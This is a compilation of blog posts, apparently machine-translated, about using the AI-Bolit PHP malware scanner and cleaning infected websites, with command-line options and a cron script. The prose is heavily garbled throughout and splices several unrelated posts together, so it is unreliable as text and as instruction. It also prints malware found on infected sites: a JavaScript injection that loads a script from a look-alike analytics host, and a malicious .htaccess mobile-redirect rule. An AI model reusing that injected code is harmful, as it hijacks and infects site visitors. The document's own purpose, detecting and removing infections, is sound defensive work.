Shell php virus web scanner. AI-Bolit is an efficient virus scanner and other malicious code for hosting. How to use the AI-Bolit scanner
AI-Bolit - efficient virus scanner and other code for hosting
We are often asked - why is the AI-Bolit scanner unique? What are the faults of other similar tools for searching for code that is maldet, clamav chi to find desktop antiviruses? A short notice - it's easier to detect bad code written in PHP and Perl. Why? See below.
During the day, sloppy code (hacker web shells, backdoors, etc.) becomes more sophisticated and collapsible. Cream obfuscation of identifiers and encryption code
Everywhere, implicit callbacks of functions began to be played for additional methods with callable arguments, handler "and indirect callables of functions.
There are fewer and fewer shkidlivy scripts with a linear structure and fixed identifiers. The code is masked and robbed of the yakomoga minlivish, “polymorphic”
abo navpak, zrobiti as much as possible forgive that similar to the original script.
Sometimes, while analyzing a sloppy script, it is impossible to see a fixing fragment, which would unambiguously identify “sloppy”. It is obvious that it is impossible to know such a shoddy code behind a simple database of signatures (anti-virus database), as it wins in the most important web anti-virus and scanners on hosting. For an effective joke modern "shkidlivih" it is necessary to use more fluent methods of denoting virus patterns, and in some cases - heuristics. The very same pidhіd mi zastosovuєmo at the scanner of the shkіdly code AI-BOLIT.
The selection of a large database of wild patterns, which are constantly being thoroughly scanned, based on regular viruses, the development of an additional heuristic analysis, based on scanning a large number of infected sites, allowed the AI-Bolit scanner to work with both the most effective and most active web admin tool.
The wide popularity of AI-Bolit, having also taken the edge off the simple interface and the possibility of a free speech with a non-commercial method. Any webmaster can, absolutely free of charge, download AI-Bolit from the official site http://revisium.com/ai/ and convert your resource to the presence of hacker shells, backdoors, doorways, viruses, spam-spamware, attachment messages and other shkidlivih fragments, etc. inserts. The scanner is also actively reviewed by commercial companies - web studios, hosting companies and Internet agencies for reviewing and matching client sites. Hosters integrate AI-Bolit into the control panel, web browsers use yogo to search for the wrong code and in the host services of site monitoring.
Below is just a small list of Ai-Bolit scanner features:
- launch from browser console
- three scanning modes ("simple", "expert", "paranoid") and two robotic modes ("express" and "external scanning")
- Search for hacker php and perl scripts (shells, backdoors), virus inserts, doors, spam extensions, scripts for the sale of messages, scripts for cloaking and other types of shkidlivih scripts. Searching for patterns and regular virazes, as well as using heuristics to designate potentially-bumpy code
- Search signatures for encrypted, fragmented text blocks and hex/oct/dec encodings
- poshuk suspicious files with constructs that can be stuck in shkidlivih scripts.
- search for attachments to files
- search for symbolic messages
- Search for the code of search engine and mobile redirects and many others.
Official side of the script
Singing leather, who creates sites, sticks with viruses and trojans on the site. The first problem is to mitigate the problem at once, until the moment, if the projects are hoarding pessimization in the form of push systems or the hoster's burden (for DDoS, spam).
This article should be written in hot lines, if there is an hour of a great backup on the machine for a Windows visit to the site ESET Smart Security raptom began to bark at the pictures, as if vvazhav vіrusnyakom. It turned out that behind the help of pictures on the site, the FilesMan backdoor was flooded.
Dira bula was in that the script allowed capturing pictures to the site by rewriting, so that the picture would be capturing only by expanding the file. Vmіst not perevіryavsya zovsіm. So you don’t need to work;) The results on the site can be taken advantage of, no matter what php file under the sight of the picture. Ale, not about dirks ...
Mova about those who were responsible for the verification of all files on the site for viruses and trojans.
Checking the site for viruses online
Online all sorts of translations of the site in the virus are not suitable for this type of word zovsim. Online scanners behave like a robot of a search engine, sequentially going through everything available sides site. Moving to the side of the site is subject to requests from other sides of the site. Resp. like an evil-doer, baying you a backdoor to the site for help, the picture is sent to that picture nowhere on the side of the site, but the site does not deface, so how to hang a virus on the side, then online review the site on the virus just doesn’t know the pictures and the virus doesn’t know.
Navischo you ask, the evildoer is so robbed? How about flooding the backdoor and doing nothing? Vidpovim - for spam, for ddosu. For any other activity, it does not show up on the sides of the site.
In a word, online review of a site in a virus is absolutely marna for complete peace of mind.
Plugin for checking WordPress site for viruses and trojans
For WordPress, there is an anti-virus plug-in. It is called wine. I have a wonderful feeling knowing pictures from FilesMan by cleaning the site from viruses. Ale vin maє important nedolіk. The first hour of rechecking the wines gives a wild connection to the server, so you just sort through all the files. In addition, re-checking out of the box can only be done by hand. It is impossible to automate re-verification of a site with a plugin.
Well, it’s possible to get a wordpress, it’s necessary to be universal.
Checking the website with the best antivirus
As it was said, more problems and were revealed vipadkovo by the most powerful desktop antivirus for an hour of backup. Obviously, you can download the entire site today and check it with the best antivirus. Everything is entirely practical.
- first, I want automation. Schob reverka bula in automatic mode and for pіdbags buv ready svіt.
- in a different way, these are the sites that shove their skin children is simply not real,
Try AI-Bolit
Schos іz intro I tighten. The results of all searches know miracles SKIN-FREE antivirus for the site. Tsey antivirus can be on the basis of different schemes of the yogo vikoristannya. I yogo vikoristav via ssh.
Chi can be yogo vikoristovuvati on shared hosting - not razbiravsya, but I think it's possible. AI-Bolit is written in php and can be launched from a browser. To that purely technically - singsongly, it is possible on shared.
Important! Aibolit is not a good site for viruses - wines for you And give a call, as the files of the vins are not safe. And why do you work with them yourself. To that, just stupidly click on the button and you won’t get lost on the site from the Trojans.
How to get AI-Bolit on VDS from ssh
Aibolite has instructions and master-classes to choose which antivirus. The sequence of a wild vapad is simple:
- download
- unpacked to the server (I unpacked from /root/ai)
- from the ssh console run php /root/ai/ai-bolit/ai-bolit.php
- rechecking can take a year, stalely according to the site
- for subbags of reverification, a file will be generated with the call AI-BOLIT-REPORT-<дата>-<время>.html
The problem files will be visible in the sound file, if so, it will be found.
Great interest on the server
The main problem is that it sticks with the automatic re-verification of the site on the virus - the cost of trying to get to the server. All anti-viruses are running at the same time, sequentially sorting through all available files. І aibolit there is no blame here. Vin just take all the files and reverify them sequentially. The idea is slow and may take a long time, which is not pleasant for production.
Ale, the aibolite has a crazy ability (for your mind, you have a full server or a VDS with root access). You can form a copy of the files for re-verification for the aibolite, and then we can make the change. Todi aibolit just go through this list.
For the formation of the list, you can speed it up by any means of the server. I have the following bash script:
# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="website" AI_PATH="/root/ai" NOW=$(date +" %F-%k-%M-%S") # you can create a public folder under password access REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Scan only X day change files # AI-BOLIT-DOUBLECHECK.php hardcoded by aibolit's author to --with-2check !!! find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -o -name "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c
# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="site" AI_PATH = "/root/ai" NOW = $(date + "%F-%k-%M-%S" ) # you can create a public folder under password access REPORT_PATH= "$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH= "/home/azzrael/web/$DOMAIN/public_html/" SCAN_DAYS = 90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH php "$AI_PATH/ai-bolit/ai-bolit.php"-- mode=1 -- report=$REPORT_PATH -- with - 2check #history -c |
Here you can see that through the find command we select all files created for the rest of SCAN_DAYS, select them from the list AI-BOLIT-DOUBLECHECK.php . SCAN_DAYS may be more than one day. If you put bash /root/ai/run.sh in some cron, the list of files to check might not be very large. Resp. rechecking the loan will not take a lot of time and will not be too hard on the server.
Are you sure that your sites are not infected with viruses? Have you checked the site in online antivirus? Forget it, online anti-viruses can never know the viruses that have been sewn into your site by good hackers.
The maximum that stinks can, is to designate shkidli scripts, which you yourself, by mistake, installed on your site. That's why you need radical methods of re-checking the site on a virus, so that you can not just jump tops, but look inside your project.
How to convert a site to a virus for a fee and free of charge?
In this article, you will be told about a dekilka of ways to convert your site to a virus:
Online anti-viruses are the simplest, but in all cases the least advanced way.
Antivirus Aibolit - the best, and the most convenient way.
Website antivirus Virusday - The best option.
A little bit about those who have an unsafe virus on the site.
Why is the site unsafe?
Ale on the cob a trio of theory special certificate- lamali me more than once. How to infect a site with a virus? Having taken access to your site, the attackers can wikonate like this:
Start driving your traffic to your projects.
Zavantazhuyut server and base data for sale to third persons.
Change contact and payment details on the site, request personal details of the correspondent.
Distribute doors with spam messages on your site.
To pass on the side of the site viruses, trojans and exploit, infecting viruses.
Spend spam from your server.
Sell access to the malicious site to other attackers for low-level unauthorized penetration.
It is important to understand: sites with viruses can be subject to sanctions poshukovyh systems and vtratiti positions. My hosting has already been bombed by hackers more than once, attacking the new one. Why bother? The goal is banal: take away access to your passwords or inject a virus into your site through the code's infuriation.
I think that I have already seen two girls flooded with them from their websites. Ale tse pіv bіdi, to the fact that my sites were infіkovanі after that, and navіt chіn passwords іѕ little іn thіє. And there are no guarantees that everything will not happen again.
Potim, if I re-enter the address, I go to the site and the admin panel in that number. What kind of bida, I do not know. On this site, my rest, there is no such thing. So i pid DDOS attacks I haven’t gotten into it yet….
The easiest way to vilify the site is to enter everything and install the script to the site again. Ale, as you understand, tse extreme zahid, to what it is necessary to go into only at the extreme slope. You can sew the same code into a template, but you won’t change it. So it’s necessary to try to figure out how many infections our site has? How tse robiti?
De-reverting a site to a virus online?
Rechecking a site in a virus online - if this method is not the most effective, as I wrote above, you can start from the new one. Є indecent service Antivirus Alarm .
Just enter the address of the site and check until the service recheck your site for viruses. If you know the fault, you suspected it, then you can see it in the stars. If you don't know anything about your online antivirus, try a better solution.
How to convert a site to a virus with a script?
Literally the same day, I checked all my sites with the antivirus Aibolit and revealed that my main infection site.
What is the antivirus and how to use it?
You can get this antivirus from the retailer's website. Aibolit . At the moment, there is a version for Windows, earlier it was possible to do it through hosting.
What can be the antivirus for the site? Axis what:
- joke viruses, shkidlivy and hacker scripts on hosting: shells for signatures and buggy patterns, shells based on clumsy heuristics - all those that are obvious - antiviruses and scanners cannot know.
- joke random scripts timthumb, fckeditor, uploadify, etc.
- Shukati redirect to .htaccess on shkіdlі sites.
- Shukati code feasible exchanges, such as sape/trustlink/linkfeed/… in .php files
- select directories and files dorviїv.
- Shukati empty messages (invisible messages) on templates.
- Show directories, open the entry.
- Work with us cms without blame (joomla, wordpress, drupal, dle, bitrix, phpbb, ...)
— call by email or save the file.
The installation is simple: unpack the archives and upload the files ai-bolit.php, .aignore, .aurlignore from the ai-bolit folder to the folder with our site, and the file from the known_files folder, which matches the version of our CMS, in my case tse.aknown.wp_3_8 Wordpress . Perhaps, you will need to set the correct permissions on the files, 755, for example.
Well, for those who have the correct hosting, you need to go to the terminal (I have Linux, it doesn’t need any emulators) and connect to our hosting via SSH.
Ssh LOGIN@SERVER_ADDRESS
How to be sure, I won’t explain, if you’re not in the right place, then it’s needed here individual pidkhid, write in the comments, I will explain.
After the connection, it is necessary to go for additional cd commands to the folder with the site. We give the command:
php ai-bolit.php
After which the scanning is revealed, it’s like a trivatime to do it for a long time, fallow to the site. After completion, the father with the site will have a file with a unique name AI-BOLIT-REPORT-07-04-2014_23-10-719945.html
Open the file and analyze what it is. I saw, for example, on the cob itself:
Shell script signature found. P_dozra on shk_dlivy script: (12)
But it turned out to be true that there was only one virus, and the seal was on the certificate, which is similar to the encryption of the record.
The easiest way to get started here is to grab a clean WordPress, otherwise what do you have there, and check the fals. As in the original, everything is the same, then it is not necessary to boast. And if not, then you can see a shkidlivy code. Dali I barked at:
Podvіyne razshirennya, ciphering content chi pіdozra on shkіdlivy script. Required additional analysis: (14)
Layavsya antivirus on one plugin - TOP 10 - no wonder, that's the problem. Also, other nebezpeki buli hibnim spratsovuvannyam.
So heuristic analysis barked at the wordpress files, but I looked at the originals and everything was fine.
These files have an invisible message placed. Suspicion for feasible spam:
Here I am a plug-in that creates the UP button - in the new Bulo, the message was added.
If you want some plugins here, you need to be aware that everything can be powerful in them. Ale virishuєtsya tse simply, close the folder with plug-ins from indexing. In Wordpress, you can robite by entering a row in robot.txt Disallow: /wp-content/plugins
For a skin type, everything will be more individual, so it is important to write more specifically. The meta stat is larger for the one to give direction.
Everything is good, she does not achieve one thing - constant monitoring. You won’t be launching your antivirus today, and hackers will work without holidays. And here another wonderful service will help us. How to reverify the site site service?
Automatic rechecking of the site on a virus
Recently appeared service Virusday , which can permanently monitor the site for the presence of viruses. Seeing everything is more familiar and functionally, the exuberance of sites in the form of viruses is the best here:
It is necessary to add your site to them and download the synchronization php-file, which is uploaded to the root of the site. Next, you can run synchronization and services to convert your site to a virus.
At no-cost version feasibility of the environment, because your site is dear to you, then you can pay a troch and sleep peacefully - the service itself will shut down the virus and immediately rejoice.
Well, axis, a virus was detected on one site. This site is guilty of vandalism on my server, until I virubav the protocol of the published publication. The problem arose, but the virus stopped:
Well, let's try to remove the infection. No, it’s not here, the service doesn’t want to see the virus without looking at it, having seen only this information:
Found threats:h.ExternalRedirect
The WEB-server configuration file has instructions on how to intelligently or insanely redirect the site to a third-party resource. Removal is recommended.
How to remove the virus, which one I know on the site? I'll try to know manually, or maybe I'll subscribe to a paid tariff, the site security screens are very important. I want, better for everything, what infection I brought from shared hosting, now I have official VPS there were no particular problems. Otzhe, register on Virusdai and connect your site.
If you want to check your site on the virus, if you know more ways, and find it more quickly for qi, then everyone would know about them.
Yesterday in me it became not even a receptionist - they infected all my sites. Good, I'm at the computer and once I mentioned the problem. What happened?
One my site has become a raptom to transfer to a dating site, an obscene site, mildly kazhuchi. When you go to my domain, it redirects you to the whole spammer site.
If the situation is even worse, if you don’t solve the problem right away, then you can blame it. And yakscho tse trivatime dovgo, then poke systems You can apply a filter to your site and enter all positions in the search.
I already wrote as if about those, but in to this particular type it was necessary to know the swidko virus. I'll just open the code shkіdlivy manually.
Since the redirection went from the other side, then I thought, what kind of script did I put in the header (header.php) or did it (footer.php). Ale there was no third-party code.
I immediately contacted the support service for hosting:
- I have such a site, becoming redirected to an obscene resource, to help solve the problem.
Ale did not overtake the stench of me, as I myself guessed, where else I needed to marvel. At the .htaccess file, which is located in the root of the site, I have shown the following code:
RewriteEngine On RewriteBase / RewriteCond %(HTTP_USER_AGENT)
mobile|midp|mmp|netfront|palm(os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0| wadofone|wap|windows (ce|phone)|xda|xiino RewriteCond%(HTTP_USER_AGENT) )|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu| ar(ch|go)| |-m | r | s) | van | be (ck | )|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)| |d(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)| |fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)| t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c| aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|jigs|kddi|keji|kgt (|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)| m1 -w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef | mo(01|02|bi|de|do|t(-| mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7 (0(0|1) | 10) | ne ((c | m) - | on | tf | wf | wg | wt) | a|d|t)|pdxg|pg(13|-(|c)) |phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|- |i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| mm | ms | ny | va) | sc (01 | h- | oo | p -) | sdk / | se (c (- | 0 | 1) | 47 | sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)| so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)| tcl-|tdg-|t(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|(40|5|-v)|vm40|voda |vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi( g | nc | nw) | wmlb | wonu | x700 | yas- | your | zeto | zte-) >> SECURE .HTACCESS
As soon as I saw yoga, everything began to work out as required. For everything, I got 5 min. But yakby in my place was a new novice, then in the new one I could drink a couple of hours, yakbi vin vzagali could know the problem himself.
On my own, I revealed that all my sites were infected by a similar rank. I solved the problem and wrote to the hosting support:
All my sites were infected, and everything on your hosting was also infected, it would be bad to get ahead of the people.
What did the bula say:
"Infected" only files of your sites. Since then, for some of your sites, I have some inconsistency, I have been victorious for changing the files on the oblique record. You need to go to the web retailer for a joke and to catch these sillinesses.
Might not be so wrong. It's not the first thing to do, if my sites are trying to infect on my hosting. Do all webmasters have the same problems? What's on my hosting?
This is not the first hosting, and nowhere I had such problems. Dedalі more schilyayu before schob change hosting, for example on CEY.
I didn’t understand the problem, as the tech support wrote me that my other site was sending spam. As it turned out, I uploaded a third-party php file to a folder with one plugin, and spam was sent through it.
I removed the whole file, and the problem was solved. I already have a clear impression that WordPress is on the same Windows, and scho cim robiti?
The greatest functionality available when running the AI-BOLIT scanner in the mode command line. It is possible to work like under Windows/Unix/Mac OS X, and without intermediary hosting, as you have access via SSH and the hosting does not strongly limit the resources of the processor, so it's good.
Please note that to run the scanner, you need a console version of PHP 7.1 or higher. More early versions they are not officially supported. Reverse current version php -v command
Refinement of the parameters of the command line of the AI-BOLIT scanner
Show help
php ai-bolit.php --help
php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov
Scan only one extension
php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl
Prepare a file for quarantine to be sent to fakhivtsy from security. The archive AI-QUARANTINE-XXXX.zip will be created with a password.
php ai-bolit.php --quarantine
Run the scanner in the "paranoid" mode (recommended for capturing the most detailed sound)
php ai-bolit.php --mode=2
php ai-bolit.php --mode=1
Convert one "pms.db" file to a random code
php ai-bolit.php-jpms.db
Run scanner from 512Mb memory space
php ai-bolit.php --memory=512M
Set the maximum size of the file to be checked 900Kb
php ai-bolit.php --size=900K
Robiti pause 500ms between files per hour of scanning (to reduce the burden)
php ai-bolit.php --delay=500
Send a message about scanning to email [email protected]
php ai-bolit.php [email protected]
Create a call from the file /home/scanned/report_site1.html
php ai-bolit.php --report=/home/scanned/report_site1.html
Scan the directory /home/s/site1/public_html/ (promotion link will be created in it, since the option --report=view_file is not set)
php ai-bolit.php --path=/home/s/site1/public_html/
Vikonati command after the completion of the scan.
php ai-bolit.php --cmd="~/postprocess.sh"
Remove the name from the text view (plain-text) from the site1.txt name
php ai-bolit.php-lsite1.txt
You can combine dzvinki, for example,
php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,suspected
Combining the AI-BOLIT scanner wiki with other unix commands, you can, for example, batch scan sites. Below we will guide the butt of re-verification of a number of sites, placements in the middle of the oblique record. For example, if the site is hosted in the middle of the /var/www/user1/data/www directory, the command to launch the scanner will be
find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path=() --mode=2 \;
By adding the --report parameter, you can check the directory, which will have a call about the scan.
php ai-bolit.php parameter list ... --eng
Switch the interface to English. Tsey parameter we can go stop.
Integration with other services and into the hosting panel
php ai-bolit.php --json_report=/path/file.json
Form a sound in json format
php ai-bolit.php --progress=/path/progress.json
Save revalidation status for json file. This file has the most structured data in the json format: streaming reverification file, number of files reverified, number of files left to reverify, reverification timestamps, an hour until the end of the scan. This mechanism can be checked, so that in the panel you can show the progress bar and data about the files that are being checked. When the scan is completed, the file is automatically displayed.
php ai-bolit.php --handler=/path/hander.php
Zovnishniy obrobnik podіy. You can add some good data to the cob/completion of the scan/progress of the scan/pardon of the scan. The example file can be viewed in the scanner archives, in the tools/handler.php directory. For example, after the scanning is completed, you can scrobble with the file (send by mail, pack into the archives later).
Today, before me, they turned for help in cleaning the online store from viruses. Unsolicited for one of the spokesmen came Google Ads adwords. The list was assigned what the file had jquery.js registered suspicious code
I went ahead to help the browser, I opened the path to the file, but the Avast antivirus did not react to dani file Wanting to visually, I already have a shkidlivy code. Then I went to ftp for the help of FileZilla and tried to open the file for the help of the Notepad++ program. І os here my antivirus blocking access to this file.
To clean the js file in the virus, I happened to turn on AVAST for 10 minutes, and then delete rows from the file.
If you have encountered a similar problem, you can see the offensive code as shown in the little one, or rows.
Varr=document.referrer; var c=document.cookie; r1=0; if ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" mail")>0)) ( document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; r1=1; ) else (if (c.indexOf(" __ga1")==-1)(document.cookie = "__ga2=1; expires=Wed, Mar 1 2020 00:00:00; path=/;";)) if (((c.indexOf("__ga1" ) )>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google- analyzing .com/urchin.js" type="text/javascript"%3E%3C/script%3E");)
Site backup.
They gave us access via ssh access, for example, for the additional utility putty and, if possible, the archives of the site. For whom is it sufficient in the console to speed up with an offensive command:
tar - cf backup .tar /home/login/site/public_html
*/home/login/site/public_html - path to the main directory of the site
You can backup the site and not work, but can you see how important it is?
Now there are two options for checking the site on the virus
1. Revising the site help php Ai-Bolit script, which detects different viruses and php shell.
2. Take the entire site to your computer and drive it away Avast antivirus, but the first option is significantly shorter, better, and significantly lower.
Cleaning the site on the local computer
On the back of my hand, I squirmed in a different way, and I will describe yoga myself. Since all the files (or archives) were downloaded to the computer, and there were not a few trochs of 25,000, I opened the Avast file and entered the folder with the files to the site for their re-verification into shkidliv scripts.
In addition, as Avast scanned the files in the folder for the website, two script viruses were detected:
- php-shell-jv
- js-redirector-fc
The index.php file is composed of the offensive code:
The javascript file "ui.datepicker_old.js" has a shky code at the very bottom of the script. This code needs to be seen!
Cleaning the site from viruses for the help of Ai-Bolit.
FTP method.
1. Capturing archives with the Aibolit script on local computer and unpack yoga.
2. Asking ftp for the help of the FileZilla client
3. Unpacking the archive files to the main directory of the site /home/your site/public_html
4. Run the script http://your domain/ai-bolit.php
5. The name file will be created in the main directory with the name AI-BOLIT-REPORT.html
As soon as the script is launched, a clean white screen appears, then the php version on the hoster's server is not suitable for Aibolit.
Respect! It is necessary to recurse all sites in the directory, zavantazhuemo script to the folder /home/domains/ or /home/, then Ai-Bolit recursively go through all the folders, and it seems to sound, but I think it's easier to reverify one domain.
Console option (SSH)
1. Run the Putty program or another console program.
2. Connect to the server by host and password.
3. Go to the main directory of the site with the command cd /home/your login/your site/public_html/
4. Capture the script with the command wget http://www..zip
5. Unpacked zip archives team unzip 20160904_112415ai-bolit.zip
6. Run the script php ai-bolit.php
For launch background mode win the command: screen -d -m php ai-bolit.php
7. Check that the script is still being checked, and make a sound " AI-BOLIT-REPORT.html"on the server.
Also, respect, as your server has php lower than 5.3 installed, Aibolit will show a pardon and do not start the scan. My mind had a chance to download the site and revise it on my server.
Once the sound file is created on the server, you can download it to your computer and look at the best browser (Chrome, Firefox, etc.).
In the first place, varto turn respect for the call about "Shkidlivy scripts", but then you either carefully see the qi files, or clean manually how I swear.
